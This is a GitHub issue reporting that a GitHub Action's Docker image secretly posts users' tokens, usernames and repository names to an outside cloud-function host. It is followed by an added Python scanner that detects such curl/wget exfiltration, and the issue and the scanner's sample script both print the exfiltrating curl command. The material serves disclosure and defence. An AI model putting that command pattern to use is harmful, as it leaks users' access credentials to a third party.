
beaujr github action steals tokens... #128

Open
Lewiscowles1986 opened this issue Jan 4, 2025 · 2 comments

Comments

@Lewiscowles1986

beaujr/[email protected] steals actions via its docker image. It takes the repo via GITHUB_REPOSITORY, and the supplied TOKEN and the supplied USER and posts to http://us-central1-savile-home-assistant.cloudfunctions.net

I'm about to report it to GitHub as collecting access tokens, usernames and repositories is a bit of a shady tactic.

@Lewiscowles1986 (Author)

Image hash
beaujr/gogitops-action latest aad028e16dab 3 years ago 2.11GB

@Lewiscowles1986 (Author)

I've filed a GitHub report on this. It really doesn't matter if it is designed or intended to steal tokens; the fact that the following code is included should give anyone using it concern.

```sh
curl -sX POST \
  https://us-central1-savile-home-assistant.cloudfunctions.net/GoFcmServer/fcm/send/grocery \
  -H 'content-type: application/json' \
  -H 'key: <I have redacted this>' \
  -H "token: $token" \
  -H "user: $user" \
  -d '{ "title": "Action In Use", "body":"'"$GITHUB_REPOSITORY $user"'", "image": ""}' >> /dev/null
```

The file is at /go/src/github.com/beaujr/gogitops/githubaction/entrypoint.sh within the image.
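As an added example (not part of this issue and not code from the beaujr/gogitops project): a small Python audit script that a consumer of third-party actions can run over an action's entrypoint script before trusting it. It joins backslash-continued lines, tokenises each `curl`/`wget` invocation with `shlex`, and reports any call that references a secret-looking shell variable (`$token`, `$GITHUB_TOKEN`, `$INPUT_SECRET`, ...) while targeting a host outside a small allowlist. The embedded entrypoint is a constructed sample modelled on the snippet quoted above; the `key` header value, the `$INPUT_TOKEN`/`$INPUT_USER` variables and the second, legitimate `api.github.com` call are assumptions for the demonstration, and `ALLOWED_HOSTS` is a placeholder list to extend for your own environment.

```python
import re
import shlex
from dataclasses import dataclass
from typing import Iterator, List, Tuple
from urllib.parse import urlparse

# Hosts a GitHub Action may legitimately contact with the repo token.
# Assumption: extend this for endpoints your own workflows are allowed to use.
ALLOWED_HOSTS = {"github.com", "api.github.com", "uploads.github.com"}

# Shell variable names whose value should never be sent to an unrelated host.
SENSITIVE_NAME = re.compile(r"token|secret|password|passwd|credential|api_?key", re.I)
VAR_REF = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")
URL_RE = re.compile(r"https?://[^\s'\"]+")

# Constructed sample entrypoint; the exfiltrating curl mirrors the one quoted
# in the issue, the other lines are assumptions added for contrast.
SAMPLE_ENTRYPOINT = r'''#!/bin/sh
set -e
token="$INPUT_TOKEN"
user="$INPUT_USER"
git clone "https://$user:$token@github.com/$GITHUB_REPOSITORY" /work
curl -sX POST \
  https://us-central1-savile-home-assistant.cloudfunctions.net/GoFcmServer/fcm/send/grocery \
  -H 'content-type: application/json' \
  -H 'key: REDACTED-PLACEHOLDER' \
  -H "token: $token" \
  -H "user: $user" \
  -d '{ "title": "Action In Use", "body":"'"$GITHUB_REPOSITORY $user"'", "image": ""}' >> /dev/null
curl -s -H "Authorization: token $token" https://api.github.com/repos/$GITHUB_REPOSITORY
'''


@dataclass
class Finding:
    line_no: int        # line in the script where the command starts
    tool: str           # curl or wget
    host: str           # destination host outside the allowlist
    variables: List[str]  # secret-looking variables referenced by the command
    command: str        # the joined command line, for the report


def _logical_lines(script: str) -> Iterator[Tuple[int, str]]:
    """Yield (start_line, command) with backslash continuations joined."""
    buf: List[str] = []
    start = None
    for n, raw in enumerate(script.splitlines(), start=1):
        if start is None:
            start = n
        if raw.endswith("\\"):
            buf.append(raw[:-1])
            continue
        buf.append(raw)
        yield start, " ".join(buf)
        buf, start = [], None
    if buf:
        yield start, " ".join(buf)


def scan_script(script: str) -> List[Finding]:
    """Flag curl/wget calls that carry secret-looking variables off-allowlist."""
    findings: List[Finding] = []
    for line_no, command in _logical_lines(script):
        stripped = command.strip()
        if not stripped or stripped.startswith("#"):
            continue
        try:
            tokens = shlex.split(stripped)
        except ValueError:
            continue  # unbalanced quotes: cannot tokenise, skip this line
        if not tokens or tokens[0] not in ("curl", "wget"):
            continue
        # Any token (header, body, URL) may embed a variable reference.
        sensitive = sorted({name for t in tokens for name in VAR_REF.findall(t)
                            if SENSITIVE_NAME.search(name)})
        if not sensitive:
            continue
        for url in (u for t in tokens for u in URL_RE.findall(t)):
            host = urlparse(url).hostname or ""
            if host not in ALLOWED_HOSTS:
                findings.append(Finding(line_no, tokens[0], host, sensitive, stripped))
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_ENTRYPOINT):
        print(f"line {f.line_no}: {f.tool} sends {f.variables} to {f.host}")
```

Run it against an entrypoint extracted from the action's image (for example with `docker cp` from a stopped container) rather than against the action's source repository: the issue above shows that the behaviour lives in the published image, which need not match the repository at the referenced tag. The allowlist check only catches plain `curl`/`wget` exfiltration; a network egress policy on the runner remains the stronger control.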
